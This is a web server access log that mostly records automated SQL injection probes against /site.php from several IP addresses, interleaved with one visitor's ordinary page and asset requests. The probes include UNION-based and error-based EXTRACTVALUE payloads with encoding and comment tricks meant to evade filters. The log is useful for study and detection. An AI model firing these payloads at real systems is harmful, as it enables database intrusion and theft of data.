190.97.249.46 - - [17/Aug/2026:18:34:03 -0400] "GET /site.php?linkid=305%20UNION%20ALL%20SELECT%20NULL%2CNULL%2C%27gyxlxahzkxwwbxoxzjbhinfnbolktmyz%27%2CNULL--%20y6tnfq&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 200 215
190.104.124.40 - - [17/Aug/2026:18:34:03 -0400] "GET /site.php?linkid=%29%20AND%20%2822492306%3D22492306AND%20EXTRACTVALUE%281101%2CCONCAT%280x7e%2C%28%28SELECT%20%28ELT%281101%3D1101%2C1%29%29%29%29%2C0x7e%29%29&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
170.82.105.201 - - [17/Aug/2026:18:34:03 -0400] "GET /site.php?linkid=305&srsltid=%27%29%2F*%2150000AND*%2F%28%27ozqkqs%27%3D%27ozqkqs%27%2F*%2150000AND*%2FEXTRACTVALUE%289344%2C%2F*%2150000CONCAT*%2F%280x7e%2C%28%28%2F*%2150000SELECT*%2F%28ELT%289344%3D9344%2C1%29%29%29%29%2C0x7e%29%29 HTTP/1.1" 403 199
190.104.124.40 - - [17/Aug/2026:18:34:04 -0400] "GET /site.php?linkid=%29%2F**%2FAND%2F**%2F%28730559982%3D730559982AND%2F**%2FEXTRACTVALUE%281101%2CCONCAT%280x7e%2C%28%28SELECT%2F**%2F%28ELT%281101%3D1101%2C1%29%29%29%29%2C0x7e%29%29&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
190.97.249.46 - - [17/Aug/2026:18:34:04 -0400] "GET /site.php?linkid=-305%20UNION%20ALL%20SELECT%20NULL%2CNULL%2C%27gyxlxahzkxwwbxoxzjbhinfnbolktmyz%27%2CNULL--%20y6tnfq&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 200 215
170.82.105.201 - - [17/Aug/2026:18:34:04 -0400] "GET /site.php?linkid=305&srsltid=%C3%80%C2%A7%C3%80%C2%A2%252527%29%2F**%2FAND%2F**%2F%28%C3%80%C2%A7%C3%80%C2%A2%252527kcpsxd%C3%80%C2%A7%C3%80%C2%A2%252527%3D%C3%80%C2%A7%C3%80%C2%A2%252527kcpsxd%C3%80%C2%A7%C3%80%C2%A2%252527AND%2F**%2FEXTRACTVALUE%289344%2CCONCAT%280x7e%2C%28%28SELECT%2F**%2F%28ELT%289344%3D9344%2C1%29%29%29%29%2C0x7e%29%29 HTTP/1.1" 403 199
190.104.124.40 - - [17/Aug/2026:18:34:04 -0400] "GET /site.php?linkid=%29%2F**%2FAND%2F**%2F%28310751765%3D310751765And%2F**%2FExTRACTVAlUE%281101%2Cconcat%280x7e%2C%28%28SeLECt%2F**%2F%28eLT%281101%3D1101%2C1%29%29%29%29%2C0X7E%29%29&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
190.97.249.46 - - [17/Aug/2026:18:34:04 -0400] "GET /site.php?linkid=305%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2C%27gyxlxahzkxwwbxoxzjbhinfnbolktmyz%27--%20f0nhxb&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 200 215
190.104.124.40 - - [17/Aug/2026:18:34:04 -0400] "GET /site.php?linkid=%29%2F*%2150000AND*%2F%281005607066%3D1005607066AND%2F**%2FEXTRACTVALUE%281101%2C%2F*%2150000CONCAT*%2F%280x7e%2C%28%28%2F*%2150000SELECT*%2F%28ELT%281101%3D1101%2C1%29%29%29%29%2C0x7e%29%29&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
170.82.105.201 - - [17/Aug/2026:18:34:04 -0400] "GET /site.php?linkid=305&srsltid=%252527%29%2F**%2FAND%2F**%2F%28%252527ULNYsI%252527%3D%252527uLNySI%252527AND%2F**%2FEXTRACTVALUE%289344%2CCONCAT%280x7e%2C%28%28SELECT%2F**%2F%28ELT%289344%3D9344%2C1%29%29%29%29%2C0x7e%29%29 HTTP/1.1" 403 199
190.104.124.40 - - [17/Aug/2026:18:34:05 -0400] "GET /site.php?linkid=%29%2F**%2FAND%2F**%2F%281892489324%3D1892489324AND%2F**%2FEXTRACTVALUE%281101%2CCONCAT%280x7e%2C%28%28SELECT%2F**%2F%28ELT%281101%3D1101%2C1%29%29%29%29%2C0x7e%29%29&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
104.252.7.61 - - [17/Aug/2026:18:34:05 -0400] "GET /artist.php?id=groupekasobane&pg=portfolio&fav=yes HTTP/1.1" 200 3078
190.97.249.46 - - [17/Aug/2026:18:34:05 -0400] "GET /site.php?linkid=-305%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2C%27gyxlxahzkxwwbxoxzjbhinfnbolktmyz%27--%20f0nhxb&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 200 215
170.82.105.201 - - [17/Aug/2026:18:34:05 -0400] "GET /site.php?linkid=305&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5%60%20AND%20EXTRACTVALUE%286541%2CCONCAT%280x7e%2C%28%28SELECT%20%28ELT%286541%3D6541%2C1%29%29%29%29%2C0x7e%29%29--%20- HTTP/1.1" 403 199
190.104.124.40 - - [17/Aug/2026:18:34:05 -0400] "GET /site.php?linkid=%29%2F**%2FanD%2F**%2F%281151699197%3D1151699197and%2F**%2FEXTrACTVAlUe%281101%2CconCAt%280X7E%2C%28%28SELeCt%2F**%2F%28elT%281101%3D1101%2C1%29%29%29%29%2C0x7e%29%29&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
104.252.7.61 - - [17/Aug/2026:18:34:06 -0400] "GET /aco.js HTTP/1.1" 200 876
170.82.105.201 - - [17/Aug/2026:18:34:06 -0400] "GET /site.php?linkid=305&srsltid=%27%29%20AND%20%28%27mhabzg%27%3D%27mhabzg%27AND%20EXTRACTVALUE%286541%2CCONCAT%280x7e%2C%28%28SELECT%20%28ELT%286541%3D6541%2C1%29%29%29%29%2C0x7e%29%29 HTTP/1.1" 403 199
190.104.124.40 - - [17/Aug/2026:18:34:06 -0400] "GET /site.php?linkid=305%25%27%29%20AND%20EXTRACTVALUE%285595%2CCONCAT%280x7e%2C%28%28SELECT%20%28ELT%285595%3D5595%2C1%29%29%29%29%2C0x7e%29%29--%20-&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
104.252.7.61 - - [17/Aug/2026:18:34:06 -0400] "GET /fancybox/jquery.fancybox.min.css HTTP/1.1" 200 12795
190.97.249.46 - - [17/Aug/2026:18:34:06 -0400] "GET /site.php?linkid=305%27%20UNION%20ALL%20SELECT%20%27gyxlxahzkxwwbxoxzjbhinfnbolktmyz%27%2CNULL%2CNULL%2CNULL--%20wnnc40&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 200 215
170.82.105.201 - - [17/Aug/2026:18:34:06 -0400] "GET /site.php?linkid=305&srsltid=%27%29%2F**%2FAND%2F**%2F%28%27jbtoyp%27%3D%27jbtoyp%27AND%2F**%2FEXTRACTVALUE%286541%2CCONCAT%280x7e%2C%28%28SELECT%2F**%2F%28ELT%286541%3D6541%2C1%29%29%29%29%2C0x7e%29%29 HTTP/1.1" 403 199
104.252.7.61 - - [17/Aug/2026:18:34:06 -0400] "GET /aco2.css HTTP/1.1" 200 10123
190.104.124.40 - - [17/Aug/2026:18:34:06 -0400] "GET /site.php?linkid=%29%20AND%20%281021234032%3D1021234032AND%20EXTRACTVALUE%285595%2CCONCAT%280x7e%2C%28%28SELECT%20%28ELT%285595%3D5595%2C1%29%29%29%29%2C0x7e%29%29&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
104.252.7.61 - - [17/Aug/2026:18:34:07 -0400] "GET /openlayers/ol.css HTTP/1.1" 200 4281
190.104.124.40 - - [17/Aug/2026:18:34:07 -0400] "GET /site.php?linkid=%29%2F**%2FAND%2F**%2F%281023783787%3D1023783787AND%2F**%2FEXTRACTVALUE%285595%2CCONCAT%280x7e%2C%28%28SELECT%2F**%2F%28ELT%285595%3D5595%2C1%29%29%29%29%2C0x7e%29%29&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
190.97.249.46 - - [17/Aug/2026:18:34:07 -0400] "GET /site.php?linkid=-305%27%20UNION%20ALL%20SELECT%20%27gyxlxahzkxwwbxoxzjbhinfnbolktmyz%27%2CNULL%2CNULL%2CNULL--%20wnnc40&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 200 215
104.252.7.61 - - [17/Aug/2026:18:34:07 -0400] "GET /fancybox/jquery.fancybox.min.js HTTP/1.1" 200 68253
170.82.105.201 - - [17/Aug/2026:18:34:07 -0400] "GET /site.php?linkid=305&srsltid=%27%29%2F**%2FAND%2F**%2F%28%27pJAHLK%27%3D%27PjAhLk%27AND%2F**%2FEXTRACTVALUE%286541%2CCONCAT%280x7e%2C%28%28SELECT%2F**%2F%28ELT%286541%3D6541%2C1%29%29%29%29%2C0x7e%29%29 HTTP/1.1" 403 199
190.104.124.40 - - [17/Aug/2026:18:34:07 -0400] "GET /site.php?linkid=%29%2F**%2FAnD%2F**%2F%2894404501%3D94404501aNd%2F**%2FeXTraCtvALuE%285595%2CCOncat%280X7e%2C%28%28SELECt%2F**%2F%28eLT%285595%3D5595%2C1%29%29%29%29%2C0x7E%29%29&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
170.82.105.201 - - [17/Aug/2026:18:34:07 -0400] "GET /site.php?linkid=305&srsltid=%27%29%2F*%2150000AND*%2F%28%27wfrhnx%27%3D%27wfrhnx%27%2F*%2150000AND*%2FEXTRACTVALUE%286541%2C%2F*%2150000CONCAT*%2F%280x7e%2C%28%28%2F*%2150000SELECT*%2F%28ELT%286541%3D6541%2C1%29%29%29%29%2C0x7e%29%29 HTTP/1.1" 403 199
190.97.249.46 - - [17/Aug/2026:18:34:07 -0400] "GET /site.php?linkid=305%27%20UNION%20ALL%20SELECT%20NULL%2C%27gyxlxahzkxwwbxoxzjbhinfnbolktmyz%27%2CNULL%2CNULL--%20ttqwmi&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 200 215
190.104.124.40 - - [17/Aug/2026:18:34:07 -0400] "GET /site.php?linkid=%29%2F*%2150000AND*%2F%28530012234%3D530012234AND%2F**%2FEXTRACTVALUE%285595%2C%2F*%2150000CONCAT*%2F%280x7e%2C%28%28%2F*%2150000SELECT*%2F%28ELT%285595%3D5595%2C1%29%29%29%29%2C0x7e%29%29&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
104.252.7.61 - - [17/Aug/2026:18:34:08 -0400] "GET /artist/groupekasobane/tn3.jpg HTTP/1.1" 200 5951
190.104.124.40 - - [17/Aug/2026:18:34:08 -0400] "GET /site.php?linkid=%29%2F**%2FAND%2F**%2F%281444431415%3D1444431415AND%2F**%2FEXTRACTVALUE%285595%2CCONCAT%280x7e%2C%28%28SELECT%2F**%2F%28ELT%285595%3D5595%2C1%29%29%29%29%2C0x7e%29%29&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
170.82.105.201 - - [17/Aug/2026:18:34:08 -0400] "GET /site.php?linkid=305&srsltid=%C3%80%C2%A7%C3%80%C2%A2%252527%29%2F**%2FAND%2F**%2F%28%C3%80%C2%A7%C3%80%C2%A2%252527iggxej%C3%80%C2%A7%C3%80%C2%A2%252527%3D%C3%80%C2%A7%C3%80%C2%A2%252527iggxej%C3%80%C2%A7%C3%80%C2%A2%252527AND%2F**%2FEXTRACTVALUE%286541%2CCONCAT%280x7e%2C%28%28SELECT%2F**%2F%28ELT%286541%3D6541%2C1%29%29%29%29%2C0x7e%29%29 HTTP/1.1" 403 199
104.252.7.61 - - [17/Aug/2026:18:34:08 -0400] "GET /bot7.gif HTTP/1.1" 200 3570
190.97.249.46 - - [17/Aug/2026:18:34:08 -0400] "GET /site.php?linkid=-305%27%20UNION%20ALL%20SELECT%20NULL%2C%27gyxlxahzkxwwbxoxzjbhinfnbolktmyz%27%2CNULL%2CNULL--%20ttqwmi&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 200 215
190.104.124.40 - - [17/Aug/2026:18:34:08 -0400] "GET /site.php?linkid=%29%2F**%2FanD%2F**%2F%281845625340%3D1845625340AND%2F**%2FeXTRActvALue%285595%2CcOnCAt%280x7E%2C%28%28SElEct%2F**%2F%28ElT%285595%3D5595%2C1%29%29%29%29%2C0X7e%29%29&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
170.82.105.201 - - [17/Aug/2026:18:34:08 -0400] "GET /site.php?linkid=305&srsltid=%252527%29%2F**%2FAND%2F**%2F%28%252527ZbxMON%252527%3D%252527zBxMon%252527AND%2F**%2FEXTRACTVALUE%286541%2CCONCAT%280x7e%2C%28%28SELECT%2F**%2F%28ELT%286541%3D6541%2C1%29%29%29%29%2C0x7e%29%29 HTTP/1.1" 403 199
190.104.124.40 - - [17/Aug/2026:18:34:09 -0400] "GET /site.php?linkid=305%22%29%20AND%20EXTRACTVALUE%288212%2CCONCAT%280x7e%2C%28%28SELECT%20%28ELT%288212%3D8212%2C1%29%29%29%29%2C0x7e%29%29--%20-&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
170.82.105.201 - - [17/Aug/2026:18:34:09 -0400] "GET /site.php?linkid=305&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5%29%20AND%20EXTRACTVALUE%285346%2CCONCAT%280x7e%2C%28%28SELECT%20%28ELT%285346%3D5346%2C1%29%29%29%29%2C0x7e%29%29--%20- HTTP/1.1" 403 199
190.104.124.40 - - [17/Aug/2026:18:34:09 -0400] "GET /site.php?linkid=%29%20AND%20%281602910855%3D1602910855AND%20EXTRACTVALUE%288212%2CCONCAT%280x7e%2C%28%28SELECT%20%28ELT%288212%3D8212%2C1%29%29%29%29%2C0x7e%29%29&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
190.97.249.46 - - [17/Aug/2026:18:34:09 -0400] "GET /site.php?linkid=305%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2C%27gyxlxahzkxwwbxoxzjbhinfnbolktmyz%27%2CNULL--%20y6tnfq&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 200 215
104.252.7.61 - - [17/Aug/2026:18:34:09 -0400] "GET /logo.gif HTTP/1.1" 200 3479
170.82.105.201 - - [17/Aug/2026:18:34:09 -0400] "GET /site.php?linkid=305&srsltid=%27%29%20AND%20%28%27akhqow%27%3D%27akhqow%27AND%20EXTRACTVALUE%285346%2CCONCAT%280x7e%2C%28%28SELECT%20%28ELT%285346%3D5346%2C1%29%29%29%29%2C0x7e%29%29 HTTP/1.1" 403 199
104.252.7.61 - - [17/Aug/2026:18:34:09 -0400] "GET /bgartists.gif HTTP/1.1" 200 1864
104.252.7.61 - - [17/Aug/2026:18:34:09 -0400] "GET /bg23.jpg HTTP/1.1" 200 7186
104.252.7.61 - - [17/Aug/2026:18:34:09 -0400] "GET /bg4.jpg HTTP/1.1" 200 1239
190.97.249.46 - - [17/Aug/2026:18:34:10 -0400] "GET /site.php?linkid=-305%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2C%27gyxlxahzkxwwbxoxzjbhinfnbolktmyz%27%2CNULL--%20y6tnfq&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 200 215
190.104.124.40 - - [17/Aug/2026:18:34:10 -0400] "GET /site.php?linkid=%29%2F**%2FAND%2F**%2F%281543312633%3D1543312633AND%2F**%2FEXTRACTVALUE%288212%2CCONCAT%280x7e%2C%28%28SELECT%2F**%2F%28ELT%288212%3D8212%2C1%29%29%29%29%2C0x7e%29%29&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
170.82.105.201 - - [17/Aug/2026:18:34:10 -0400] "GET /site.php?linkid=305&srsltid=%27%29%2F**%2FAND%2F**%2F%28%27finrro%27%3D%27finrro%27AND%2F**%2FEXTRACTVALUE%285346%2CCONCAT%280x7e%2C%28%28SELECT%2F**%2F%28ELT%285346%3D5346%2C1%29%29%29%29%2C0x7e%29%29 HTTP/1.1" 403 199
190.104.124.40 - - [17/Aug/2026:18:34:10 -0400] "GET /site.php?linkid=%29%2F**%2FanD%2F**%2F%281810338931%3D1810338931ANd%2F**%2FexTRACTVALUE%288212%2CconCAt%280X7E%2C%28%28seleCT%2F**%2F%28eLt%288212%3D8212%2C1%29%29%29%29%2C0x7e%29%29&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
190.97.249.46 - - [17/Aug/2026:18:34:10 -0400] "GET /site.php?linkid=305%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2C%27gyxlxahzkxwwbxoxzjbhinfnbolktmyz%27--%20f0nhxb&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 200 215
190.104.124.40 - - [17/Aug/2026:18:34:11 -0400] "GET /site.php?linkid=%29%2F*%2150000AND*%2F%281710729980%3D1710729980AND%2F**%2FEXTRACTVALUE%288212%2C%2F*%2150000CONCAT*%2F%280x7e%2C%28%28%2F*%2150000SELECT*%2F%28ELT%288212%3D8212%2C1%29%29%29%29%2C0x7e%29%29&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
170.82.105.201 - - [17/Aug/2026:18:34:11 -0400] "GET /site.php?linkid=305&srsltid=%27%29%2F**%2FAND%2F**%2F%28%27xFjEZr%27%3D%27XfjEZr%27AND%2F**%2FEXTRACTVALUE%285346%2CCONCAT%280x7e%2C%28%28SELECT%2F**%2F%28ELT%285346%3D5346%2C1%29%29%29%29%2C0x7e%29%29 HTTP/1.1" 403 199
190.97.249.46 - - [17/Aug/2026:18:34:11 -0400] "GET /site.php?linkid=-305%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2C%27gyxlxahzkxwwbxoxzjbhinfnbolktmyz%27--%20f0nhxb&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 200 215
190.104.124.40 - - [17/Aug/2026:18:34:11 -0400] "GET /site.php?linkid=%29%2F**%2FAND%2F**%2F%28318108723%3D318108723AND%2F**%2FEXTRACTVALUE%288212%2CCONCAT%280x7e%2C%28%28SELECT%2F**%2F%28ELT%288212%3D8212%2C1%29%29%29%29%2C0x7e%29%29&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
170.82.105.201 - - [17/Aug/2026:18:34:11 -0400] "GET /site.php?linkid=305&srsltid=%27%29%2F*%2150000AND*%2F%28%27jtfytr%27%3D%27jtfytr%27%2F*%2150000AND*%2FEXTRACTVALUE%285346%2C%2F*%2150000CONCAT*%2F%280x7e%2C%28%28%2F*%2150000SELECT*%2F%28ELT%285346%3D5346%2C1%29%29%29%29%2C0x7e%29%29 HTTP/1.1" 403 199
190.104.124.40 - - [17/Aug/2026:18:34:11 -0400] "GET /site.php?linkid=%29%2F**%2FAnD%2F**%2F%28535799946%3D535799946anD%2F**%2FExTRACtVAlue%288212%2CcoNcAt%280x7e%2C%28%28SeLeCT%2F**%2F%28eLt%288212%3D8212%2C1%29%29%29%29%2C0x7E%29%29&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
190.97.249.46 - - [17/Aug/2026:18:34:12 -0400] "GET /site.php?linkid=305%20UNION%20ALL%20SELECT%20%27gyxlxahzkxwwbxoxzjbhinfnbolktmyz%27%2CNULL%2CNULL%2CNULL%2CNULL--%205tv2ip&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 200 215
170.82.105.201 - - [17/Aug/2026:18:34:12 -0400] "GET /site.php?linkid=305&srsltid=%C3%80%C2%A7%C3%80%C2%A2%252527%29%2F**%2FAND%2F**%2F%28%C3%80%C2%A7%C3%80%C2%A2%252527ztfrmp%C3%80%C2%A7%C3%80%C2%A2%252527%3D%C3%80%C2%A7%C3%80%C2%A2%252527ztfrmp%C3%80%C2%A7%C3%80%C2%A2%252527AND%2F**%2FEXTRACTVALUE%285346%2CCONCAT%280x7e%2C%28%28SELECT%2F**%2F%28ELT%285346%3D5346%2C1%29%29%29%29%2C0x7e%29%29 HTTP/1.1" 403 199
190.97.249.46 - - [17/Aug/2026:18:34:12 -0400] "GET /site.php?linkid=305&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5%20UNION%20ALL%20SELECT%20NULL%2C%27tkfgaycxxxwsjaqwcexwmrxgrbpdhkxh%27--%20c81t3c HTTP/1.1" 302 215
170.82.105.201 - - [17/Aug/2026:18:34:12 -0400] "GET /site.php?linkid=-305%20UNION%20ALL%20SELECT%20%27gyxlxahzkxwwbxoxzjbhinfnbolktmyz%27%2CNULL%2CNULL%2CNULL%2CNULL--%205tv2ip&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 200 215
190.104.124.40 - - [17/Aug/2026:18:34:13 -0400] "GET /site.php?linkid=305&srsltid=%252527%29%2F**%2FAND%2F**%2F%28%252527ErXnlL%252527%3D%252527erXNlL%252527AND%2F**%2FEXTRACTVALUE%285346%2CCONCAT%280x7e%2C%28%28SELECT%2F**%2F%28ELT%285346%3D5346%2C1%29%29%29%29%2C0x7e%29%29 HTTP/1.1" 403 199
104.252.7.61 - - [17/Aug/2026:18:34:13 -0400] "GET /favicon.ico HTTP/1.1" 404 4391
170.82.105.201 - - [17/Aug/2026:18:34:13 -0400] "GET /site.php?linkid=305%25%22%29%20AND%20EXTRACTVALUE%288835%2CCONCAT%280x7e%2C%28%28SELECT%20%28ELT%288835%3D8835%2C1%29%29%29%29%2C0x7e%29%29--%20-&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
190.104.124.40 - - [17/Aug/2026:18:34:13 -0400] "GET /site.php?linkid=305&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5%20UNION%20ALL%20SELECT%20NULL%2C%27tkfgaycxxxwsjaqwcexwmrxgrbpdhkxh%27--%20c81t3c HTTP/1.1" 302 215
170.82.105.201 - - [17/Aug/2026:18:34:14 -0400] "GET /site.php?linkid=305&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5%27%29%20AND%20EXTRACTVALUE%284287%2CCONCAT%280x7e%2C%28%28SELECT%20%28ELT%284287%3D4287%2C1%29%29%29%29%2C0x7e%29%29--%20- HTTP/1.1" 403 199
190.104.124.40 - - [17/Aug/2026:18:34:14 -0400] "GET /site.php?linkid=305%20UNION%20ALL%20SELECT%20NULL%2CNULL%2C%27gyxlxahzkxwwbxoxzjbhinfnbolktmyz%27%2CNULL%2CNULL--%205cnikx&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 200 215
170.82.105.201 - - [17/Aug/2026:18:34:14 -0400] "GET /site.php?linkid=305&srsltid=%27%29%20AND%20%28%27wycsvs%27%3D%27wycsvs%27AND%20EXTRACTVALUE%284287%2CCONCAT%280x7e%2C%28%28SELECT%20%28ELT%284287%3D4287%2C1%29%29%29%29%2C0x7e%29%29 HTTP/1.1" 403 199
105.209.176.49 - - [17/Aug/2026:18:34:14 -0400] "GET /site.php?linkid=%29%20AND%20%281741314278%3D1741314278AND%20EXTRACTVALUE%288835%2CCONCAT%280x7e%2C%28%28SELECT%20%28ELT%288835%3D8835%2C1%29%29%29%29%2C0x7e%29%29&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
170.82.105.201 - - [17/Aug/2026:18:34:15 -0400] "GET /site.php?linkid=305&srsltid=%27%29%2F**%2FAND%2F**%2F%28%27qgprtr%27%3D%27qgprtr%27AND%2F**%2FEXTRACTVALUE%284287%2CCONCAT%280x7e%2C%28%28SELECT%2F**%2F%28ELT%284287%3D4287%2C1%29%29%29%29%2C0x7e%29%29 HTTP/1.1" 403 199
190.104.124.40 - - [17/Aug/2026:18:34:15 -0400] "GET /site.php?linkid=-305%20UNION%20ALL%20SELECT%20NULL%2CNULL%2C%27gyxlxahzkxwwbxoxzjbhinfnbolktmyz%27%2CNULL%2CNULL--%205cnikx&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 200 215
105.209.176.49 - - [17/Aug/2026:18:34:15 -0400] "GET /site.php?linkid=%29%2F**%2FAND%2F**%2F%28193689807%3D193689807AND%2F**%2FEXTRACTVALUE%288835%2CCONCAT%280x7e%2C%28%28SELECT%2F**%2F%28ELT%288835%3D8835%2C1%29%29%29%29%2C0x7e%29%29&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
170.82.105.201 - - [17/Aug/2026:18:34:15 -0400] "GET /site.php?linkid=305&srsltid=%27%29%2F**%2FAND%2F**%2F%28%27pnCihT%27%3D%27pNcIht%27AND%2F**%2FEXTRACTVALUE%284287%2CCONCAT%280x7e%2C%28%28SELECT%2F**%2F%28ELT%284287%3D4287%2C1%29%29%29%29%2C0x7e%29%29 HTTP/1.1" 403 199
105.209.176.49 - - [17/Aug/2026:18:34:16 -0400] "GET /site.php?linkid=%29%2F**%2FaND%2F**%2F%281054931672%3D1054931672and%2F**%2FexTRACtValuE%288835%2CCoNCat%280x7E%2C%28%28sElECT%2F**%2F%28elt%288835%3D8835%2C1%29%29%29%29%2C0X7e%29%29&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
170.82.105.201 - - [17/Aug/2026:18:34:16 -0400] "GET /site.php?linkid=305&srsltid=%27%29%2F*%2150000AND*%2F%28%27gzjuwg%27%3D%27gzjuwg%27%2F*%2150000AND*%2FEXTRACTVALUE%284287%2C%2F*%2150000CONCAT*%2F%280x7e%2C%28%28%2F*%2150000SELECT*%2F%28ELT%284287%3D4287%2C1%29%29%29%29%2C0x7e%29%29 HTTP/1.1" 403 199
190.104.124.40 - - [17/Aug/2026:18:34:16 -0400] "GET /site.php?linkid=305%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2C%27gyxlxahzkxwwbxoxzjbhinfnbolktmyz%27%2CNULL--%20sau01u&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 200 215
